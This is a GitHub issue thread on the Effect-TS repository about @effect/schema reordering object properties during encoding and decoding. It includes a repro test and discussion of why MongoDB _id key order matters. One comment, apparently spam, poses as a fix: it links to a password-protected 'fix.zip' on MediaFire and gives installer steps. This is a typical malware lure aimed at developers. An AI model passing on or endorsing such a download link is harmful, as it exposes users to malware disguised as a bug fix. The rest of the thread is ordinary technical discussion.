### ISSUE TITLE
@effect/Schema encode/decode re-orders props

### ISSUE THREAD

**Issue by arijoon** [Effect-TS/effect#3505]
### What version of Effect is running?

@effect/schema: 0.71.2

### What steps can reproduce the bug?

```ts
import { Schema } from "@effect/schema";
import { expect, it } from "@effect/vitest";
import { Effect } from "effect";

it.effect("Schema re-orders without respecting definition or prop order", () =>
  Effect.gen(function*() {
    const MySchema = Schema.Struct({
      t: Schema.Struct({
        l: Schema.Number,
        h: Schema.Number,
      }),
      i: Schema.Number,
    });

    const data = {
      t: { l: 10, h: 99 },
      i: 0,
    };

    const encoded = yield* Schema.encodeUnknown(MySchema)(data);
    const propOrders = ["t", "i"];
    expect(encoded).toEqual(data);
    expect(Object.keys(encoded)).toEqual(propOrders);

    const decoded = yield* Schema.decodeUnknown(MySchema)(data);
    expect(decoded).toEqual(data);
    expect(Object.keys(decoded)).toEqual(propOrders);
  }));
```

### What is the expected behavior?

Schema either retains the original properties order or better yet, properties are ordered according to the Schema definition

### What do you see instead?

Properties are re-ordered based on the value (if `t` in the example above is a Number, order is retained, but when its an object, order changes)

### Additional information

It's possible to keep the original order by passing `{ propertyOrder: 'original' }`, however this is highly unintuitive as one would not expect the seemingly random ordering of the returned values

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mikearnaldi** [comment]
imho I would not expect ordering on object keys

**Comment by arijoon** [comment]
> imho I would not expect ordering on object keys

would you expect the order to be changed though as default behaviour? The main reason for raising this is the unexpected behaviour with certain databases. For example if using mongo, and encoding a schema to be stored, then the order of props could matter. This can create some unexpected behaviour until its investigated and realising that props are being re-ordered through encoding's default behaviour

**Comment by datner** [comment]
>  if using mongo, and encoding a schema to be stored, then the order of props could matter.

could you elaborate? That sounds odd

**Comment by arijoon** [comment]
> > if using mongo, and encoding a schema to be stored, then the order of props could matter.
> 
> could you elaborate? That sounds odd

Sure. Lets imagine we want to store a document in mongo with the following composition:

```ts
doc = { _id: { a: number, b: number } }
```

So I insert the following `{ _id: { a: 1, b: 2 } }` into the collection. Now when reading this document, I can query by id but **only** if the correct order of properties are provided, for example querying for `_id: { b: 2, a: 1 }` does not return my document. This is because to mongo `{a: 1, b: 2} !== { b: 2, a: 1}`. When comparing objects, it concats the props are does a binary blob comparison. 
You can query for that like this: `{'_id.a': 1, '_id.b': 2}` but this'll need an additional compound index.

I don't know if there'll be other storage mediums that do a similar comparison, but re-ordering the props by default can cause hard to trace issues. Once someone is aware of this, its quite easy to fix, but can take a lot of digging to actually find it, especially if you encode/decode on the interface with db

**Comment by mikearnaldi** [comment]
> > imho I would not expect ordering on object keys
> 
> would you expect the order to be changed though as default behaviour? The main reason for raising this is the unexpected behaviour with certain databases. For example if using mongo, and encoding a schema to be stored, then the order of props could matter. This can create some unexpected behaviour until its investigated and realising that props are being re-ordered through encoding's default behaviour

Records are **not** ordered data structures so relying on implicit order of keys is semantically odd. In older JS engines order was random, only recently they were made stable, but it is still odd, like let's say you have:

```ts
const o = {
  a: 0,
  b: 1
};

o["a"] = 2;
```

what order would you expect? and with:

```ts
const o = {
  a: 0,
  b: 1
};

o["c"] = 2;
```

?

**Comment by datner** [comment]
I believe he's pointing out that a schema can either be deterministically ordered or allow for transformations, but not both. Your use case is valid, though very niche.. Maybe you could do something like this?
```ts
class _IdAB extends Schema.Class("...")<_IdAB>({
  a: Schema.string,
  b: Schema.string,
}) {
  static Ordered: (self: typeof this.Encoded) => ({
    a: self.a,
    b: self.b
  })
}
```
Also, do you expect the schema to _order_ the values, or to _keep their order_?
```ts
const foo = new IdAB({ b: "b", a: "a"})
Schema.encode(_IdAB)(foo) // { b: "b", a: "a"} or { a: "a", b: "b"} ?
```
Regardless, I think that mongoose is in the wrong here, this is very unsafe and unintuitive behaviour, every time it works it works on accident 🤨

**Comment by arijoon** [comment]
> Also, do you expect the schema to order the values, or to keep their order?

Currently we're using `{  propertyOrder: 'original'  }` for all mongo related schemas. Ideally I would prefer the Schema to order them to prevent any issue at call site (since they can be passed in the wrong order). Completely agree that mongo driver should get a list instead if order matters but unfortunately that's out of our control (mongoose also changed their behavior from one of the recent versions to start ordering the properties based on their schema order, previously it wasn't changing the order, but we don't use mongoose and directly use mongo driver with Effect schemas for encoding/decoding)
